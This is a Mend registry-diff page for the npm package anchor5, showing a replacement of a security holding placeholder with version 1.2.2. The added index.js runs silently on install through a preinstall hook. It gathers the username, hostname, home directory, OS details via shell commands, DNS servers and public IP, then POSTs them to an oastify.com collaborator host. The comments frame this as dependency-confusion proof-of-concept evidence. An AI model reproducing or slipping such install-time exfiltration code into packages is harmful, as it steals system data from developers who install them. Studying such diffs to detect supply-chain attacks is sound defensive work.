npm - anchor5 - Versions diffs - 0.0.1-security → 1.2.2 - Mend

anchor5 0.0.1-security → 1.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of anchor5 might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,100 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const http = require("http");
+const packageJSON = require("./package.json");
+const child_process = require("child_process");
+const package = packageJSON.name;
+// Point 2: OS Name - Function to get detailed OS information (covers OS name and version via platform-specific commands)
+function getOSDetails() {
+    try {
+        if (os.platform() === "win32") {
+            return child_process.execSync("wmic os get Caption,CSDVersion /value").toString().trim();
+        } else if (os.platform() === "linux") {
+            return child_process.execSync("lsb_release -a || cat /etc/os-release").toString().trim();
+        } else if (os.platform() === "darwin") {
+            return child_process.execSync("sw_vers").toString().trim();
+        }
+    } catch (e) {
+        return "Unknown";
+    }
+}
+// Point 1: HTTP Requests from Internal/External IP Addresses (with Hostname and Order) - This GET request to ip-api.com fetches public IP/org, proving external forwarding from program's IP; order starts here (1. Fetch IP info)
+http.get("http://ip-api.com/json", (res) => {
+    let data = "";
+    res.on("data", chunk => data += chunk);
+    res.on("end", () => {
+        let ipInfo;
+        try {
+            ipInfo = JSON.parse(data);
+        } catch {
+            ipInfo = {};
+        }
+        const orgName = ipInfo.org || "Unknown";
+        const publicIP = ipInfo.query || "Unknown";
+        const isp = ipInfo.isp || "Unknown";
+        // Point 4: Proving All Points - Construct bundled evidence payload (includes data from all points, like hostname, OS details, etc., for verification)
+        // Point 1 continued: Includes hostname (os.hostname()) to verify ownership; order: 2. Collect and bundle data
+        const trackingData = JSON.stringify({
+            p: package,
+            c: __dirname,
+            hd: os.homedir(),
+            hn: os.hostname(),  // Ties to Point 1: Hostname for IP ownership verification
+            un: os.userInfo().username,
+            dns: dns.getServers(),
+            r: packageJSON ? packageJSON.___resolved : undefined,
+            v: packageJSON.version,
+            pjson: packageJSON,
+            os_type: os.type(),  // Ties to Point 2: OS Name
+            os_platform: os.platform(),  // Ties to Point 2: OS Name
+            os_release: os.release(),  // Ties to Point 2: OS Name
+            os_arch: os.arch(),  // Ties to Point 2: OS Name
+            os_version_detailed: getOSDetails(),  // Ties to Point 2: OS Name (detailed output)
+            cpu_info: os.cpus()[0],
+            total_memory: os.totalmem(),
+            free_memory: os.freemem(),
+            browser_details: {
+                userAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36",
+                browser: "Chrome",
+                version: "138.0.0.0",
+                platform: os.platform(),
+            },
+            system_uptime: os.uptime(),
+            public_ip: publicIP,  // Ties to Point 1: External IP from program's assets
+            organization: orgName,  // Ties to Point 1: Org for IP ownership
+            isp: isp,  // Ties to Point 1: ISP for IP context
+        });
+        const postData = querystring.stringify({ msg: trackingData });
+        // Point 1 continued & Point 3: Output from wget-like Command - This POST is the final request in the order (3. Exfiltrate to Collaborator); equivalent to wget output capture via execSync in getOSDetails()
+        // Point 4 continued: Sends bundled evidence, proving all points tied to program's internal/external context
+        const options = {
+            hostname: "6w3hlfca60k38v6t5q3shzpqhhn8byzn.oastify.com", // your burp collaborator
+            port: 443,
+            path: "/",
+            method: "POST",
+            headers: {
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Content-Length": postData.length,
+            },
+        };
+        const req = https.request(options, (res) => {
+            res.on("data", (d) => process.stdout.write(d));
+        });
+        req.on("error", (e) => { /* silent */ });
+        req.write(postData);
+        req.end();
+    });
+});

package/package.json CHANGED Viewed

@@ -1,6 +1,15 @@
 {
   "name": "anchor5",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.2.2",
+  "description": "test",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "anchor5": "^1.2.1"
+  }
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=anchor5 for more information.